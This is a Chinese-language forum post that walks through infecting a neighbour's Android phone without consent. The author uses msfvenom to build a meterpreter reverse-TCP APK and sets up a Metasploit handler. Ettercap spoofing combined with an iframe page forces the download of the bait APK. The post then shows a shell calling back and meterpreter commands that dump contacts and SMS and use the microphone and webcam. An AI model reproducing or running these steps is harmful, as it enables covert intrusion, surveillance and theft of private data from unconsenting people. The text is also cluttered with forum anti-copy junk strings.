找回密码
 立即注册
查看: 1962|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

# J2 s8 E& L1 ~: r; G' z 五、msf+ettercap入侵邻居安卓手机 ) X* b/ x8 G) S3 {! a9 A7 L

1 I0 o- \5 t% ]/ ~% q) K

0 {' A% U, P- @" p( C% L# g" D 首先启动msf # J2 \, K' s2 \9 {# D! K7 F* p

5 W" t) n* L" f1 X7 t; m- n* ^

0 o, k1 ~1 ]& Q5 Q0 k7 M- ?) g' p( X 先用kali生成一个安卓木马,如下命令: _4 n& I, z( d+ o2 f

8 U" r. j( ~# x* Z

0 \6 n1 n% I) j9 Y( ?9 t/ u) G4 t Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk 6 K$ p6 f$ I1 x% } _, u

6 w3 d- w& t w! V/ I- i

7 D* Q0 X( E P( y1 ] 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 6 j4 o( S& Z, Q5 A( A0 }3 v" s- T

: K% i. w* y! d; H# T9 [ f

) c8 x' T7 }6 c" I' g 然后进入msf " u9 s4 k- ]* t- C* D4 b' V" o

^3 \" m n( U, @# K9 v. B

5 P: u) k3 R5 g+ w5 V# W# O6 ~ use exploit/multi/handler ! ]/ \) S h% X

+ j3 ]; D8 }* Z$ }- |: K

: D* d) E# K7 z5 j set payload android/meterpreter/reverse_tcp + ~- j' y( ^ W( J/ O

0 u: b6 u7 I/ ?' L7 W

, |2 J8 o5 O P set LHOST 192.168.0.109 //ipkailiip 6 j1 S5 H9 F/ `4 e) {

+ j! }2 c/ ^& B H/ Y

+ Q6 c$ Q* _9 m" Y4 j, J5 ^ set LPORT 44444 //端口一定要与前面生成的木马的端口一致 - F$ C, }! t3 m) _+ Y

' a8 g0 H% b [) f, [

2 A* M0 O+ x& D1 ^/ K1 P3 q; A Exploit " ^" s0 a4 q! n

# K) w* [8 p; {3 a' d( B

# l, x: _! V# [+ J   7 ^: s0 y' z( K) r: A% l/ g

; q, d( {. ?1 r$ f2 Y: w

6 N3 X+ U0 C! y# |% a 下面我们开启ettercap -G 7 u: K1 D7 x: }2 `- S+ z! K& p/ M9 x% S

% v: C2 ?) t; X r/ H

l/ K+ w# [' ^: g) r 我物理IP 8 K% r9 G6 k, B2 q0 y" Q/ ?) ?/ M

. p# D `2 O: O# j( y P

" p0 Z, ^7 S) U0 Z! Z* k   T; k1 ^$ N, j

- o- k& q5 O) `8 V% m

$ V3 Q4 U& R" z* l3 S/ y 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, 0 {1 q0 j: l5 h$ K, L Z% P

% q5 g/ Q& B# j- ? z

5 \4 Q" ?) X0 c 下面我们来设置一下 9 e+ ~5 d$ I y) \9 s# J g; [: B$ R

$ Y- z; N9 A( ~$ {: x' A4 H1 b

/ [: H, q# b d, G5 B5 F; y, o   # X- O( R+ \ y" g& _

x! Q. B9 M$ q% u

1 C6 Z8 x2 A/ ~' b) @* r 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, r! U' q8 U; ]4 P

# q W( G8 r- T/ X

/ q# N$ L! c9 g+ B4 x   . G. G! \! G4 [( N

4 P7 F% d: W2 Q) _+ ]) ^+ }3 Q

; E# f# X/ r- n, Y8 W   ; I, J6 @. @* T% z x% C

? n! _% w/ E9 |8 Q4 q8 P

# u# |4 I4 Y& ^& Y9 Y0 I! Q   6 \- U: f) h# Q7 L7 z* N# \

6 O2 U4 l+ b' ]3 F8 `

' V7 n6 l9 a* r. y8 }   / \ ?# l& H4 I$ R. H

/ }7 G3 h& S+ _5 ?

! y3 r5 T- Z/ n/ ^ }' v/ D* a   0 y. P: @( A2 d9 @! N; u& L! l

5 _# u5 p. r0 v' c) H. X

% h x5 Z$ {- w   - t' b0 U2 i5 N( r) O- o3 P

9 r1 s; S+ Z- i$ H

+ t1 H8 K4 i! d- e! X$ F& P   7 S4 Y l+ n+ m% A, S

; W) O# ]5 l* T; S

/ B$ l4 {6 K4 |9 O4 M: _4 ^   5 h0 V; K) u4 R( r

' I; x6 S9 P9 t3 a; Y7 J2 u" c

8 Y. B' f7 T9 o( B" F! Q" O# P   - S0 g: ~) o3 S# ]* o

) h! ?! b1 }6 Z: B; b( ]

9 n2 b8 U ?+ z   , v1 ^7 |6 {% R& ~8 N- _

+ m; B* S2 d5 M- r# e0 d) I2 n

% \5 z$ ?" @: P( _2 n   " d& W3 H y4 y# ^( c

! n: A, r( Y/ e0 S+ M! v1 O! V

& o+ g4 A) l+ a   7 c) W: |6 _# l# c+ V$ Q- Q1 q y

3 u7 u& r- g/ ]- ?

" |& _' z: O" j   ' W2 `$ E; y8 U; j2 ~/ Y5 H4 z

! y! @- n J( x, L* ^8 ^3 U

) a% [% E% e" y" e z! X 下面我们开始攻击 + N, F( t6 v0 E) }

- ^9 X9 n4 G' c w

/ _5 h( _( a. o, [# I' M6 t   / f1 ?9 \% C' N1 X! H

8 G7 p4 w% L# g3 |

% {% j( F8 h. ]) K! w1 i# [+ F   7 s$ _# k; Q w# L1 h& u5 p* O! G

9 J+ L/ J3 w* h% n

" _' @/ ~, A B( i2 ^$ [0 t   5 u% g7 |% ^0 g8 r6 `" K% [

% P/ Z# b# j2 D# f9 g

+ Q* Y$ K9 T) V) r: W4 U$ F( \   % a$ @/ K h$ P0 i5 ?1 ^( |, Q M

) v( n: P% k S' O) y3 w# j

8 f) L( l/ j; y( n( V# ]9 }   , C8 r, e# ~7 O

6 k' l2 I; E' J4 P8 g0 j

% F; u: N' e9 Y0 c) R 大概过了5分钟多,发现反弹成功了 + n7 B0 }3 U: f1 M- L% w# C: w1 u

8 c3 r+ d5 u7 B/ o

$ O7 _/ b. M1 ~8 d- B$ v% G' C   & @: P! G) w \* q: e; Y

X% d- D4 W" O) `: O$ ~

7 Z: n$ b1 I) }! i. j& ? B* ^; }9 P   ' q" k6 [% K' N4 v

& N8 |9 u) I& Y9 z! c9 X4 P" b4 I

* r" S2 e/ q- p   $ e) q. c9 F) c" r. G

! Z+ K% q( p2 N" w5 e* `' r% r

8 K: |" R% Y+ J/ r1 q; x$ P   ! @: z2 r, x H! s/ L% \% M

# H6 D$ M. s- T* c5 D6 M( ], w, ?

7 K# j# u/ ~) j0 }, L9 X8 T* M8 Y   ' \" j. n1 ]7 Q* q* C, s% A

4 T, t- t7 n$ j7 W+ S- M( |

* V) r% S( e7 V5 w/ {, x   - F8 l5 o! |- X J; j B

3 g2 n0 w) t: a4 b. t* f* K

: P- N) B0 x6 G/ k2 Y   3 H4 Y; z t& J1 B. ?$ l8 H

6 D: u: J! R! d/ r0 s/ ]& a

* m1 P; ], u2 _' T 执行命令 : R# K' D9 C% _+ O% {

- g* M( f/ x/ z3 @ ?. W& U; W

9 r* h) m* A. X j1 }; ~, C( L   % l" Z0 V/ P' q) O" A

3 B2 ?# E7 ?! _% I

& S/ \: i/ _$ u: C dump_contacts    --》这个是导出电话 : x0 a' z6 U2 c' _, {8 r

6 [2 r, P( Y7 B

" }6 Q! F/ @* p dump_sms --》这个是导出信息 $ M; H& l m* q. u: p

3 } ?% h- g* c7 a4 I9 T, k7 V# ?3 \

# c) l* u9 w' h; M h record_mic     Record audio from the default microphone for X seconds 2 s- `& |9 d8 T, J

& Q) \; ^( \- N: J; P

/ y! l7 Z8 {' x" H" C$ ^8 z- P2 B     webcam_chat    Start a video chat " O1 f& y: \' K) [8 C; J1 I

: m2 l+ ]- ~2 Z0 {# T

( N% B( F- C( y, Y U; S     webcam_list    List webcams 6 m; P; Q: K* r. P- U

. i4 _: C3 m" o" e) x

. H0 S! h+ t3 k5 A8 E     webcam_snap    Take a snapshot from the specified webcam * b1 k s6 \3 n; ~

! M9 ^, I2 j( t. p

/ p# [- V* I) v$ J+ ?7 j- `4 m# ^ webcam_stream  lay a video stream from the specified webcam 5 j' `& w0 z& h& y: L

! N5 M9 c/ X3 F+ E

: P& [- J4 L( `; x1 O' A0 z   8 \2 N1 P7 W6 O* Z; Q. m

* r) F1 `# q2 N# Q! T

& j/ E3 \( ^0 B5 L9 H% T% z9 W   9 ^, u* V; g; V& @3 W% [, G7 X3 J

! O. S* ]- d ^5 B

8 L5 [! X4 h3 K8 s2 u 我们打开看一下电话薄, ! |; Z& C- E# w4 N, q8 o$ U

0 g$ N, i! a% P# I

& I y- F, q2 s+ I* W0 @   ! X0 e4 _1 t& Q2 ^

: y! @4 K1 ?$ f2 [7 y

/ U U* @0 m) F4 J) T4 ?! N/ k   $ Q4 H* D2 {, Z

& h( H4 S& [4 L- j7 {! U

& }; n: {0 ?$ T   : g! G% j6 ^1 j1 S' c8 h6 a

3 {1 ]6 S L7 k# w3 k4 p

- p1 E0 u; ]! E# n, ?" Y# [   . T; a0 p8 u8 Y; |" Z

}8 j- ]! i$ K2 {6 V* ?# G/ e

4 v/ q+ j: l3 X! q# i; \   w, n, { j8 |7 x

$ Y' {6 X" \1 |5 w

6 ~. k D0 Y9 e4 W, v C* C   : Z) d0 r* V% ]8 @& T. U

8 ^/ x0 A/ {2 ^. b

& E, j; s! l& q& b7 n& ^% H2 q 我们同时欺骗成DroidJack木马,使用方法如图: " O8 a8 W7 _3 ?

( k+ W; t( t9 a( |

" j" u4 M6 c% n+ O. X. d" W0 s2 j4 l   % N, u* Y; ?, t8 E* J2 ]

5 o8 O$ N5 z$ @( t& m

) J0 }( ?/ F6 z: s/ m" S   # B5 v$ ^* }+ ~2 ]

+ Z( h4 |3 y9 t" k8 Q) ^+ [ M( [

+ G& M7 D" w+ l8 c0 i/ W* X# }9 g# W   % n: J$ Q7 [* F; I

" g5 ?' z. ~( Z9 z, S9 f. H5 C

* ?7 H) H3 q% D# G 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 8 a) k+ }1 H# ?' ?1 q6 `1 ^

. d$ X# q0 F( B( Q9 o# r

& S' Y2 J& n8 J& P$ m   # O8 t5 w' V0 F$ n0 g

2 p9 O% Z+ H' u5 @

) O0 ]1 ~9 ? J1 m* F" D   , s. L, w# y6 E

0 b* O, m; w% t- U: |' }7 x

6 O9 M5 g, E4 J- G3 J   $ Q2 M" g+ u6 @7 X1 t

* |2 r' X$ b+ y# l6 H: E2 i

! X9 X$ |8 {# m' t; j) q% Y# Q% q 9 F/ t, G9 R3 R5 _) e. q7 p

5 f* d; T: c# X$ g6 m9 n

. ^& f9 m- O; Q3 T
6 g+ _& `) c( t! z, X: V2 w4 W

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表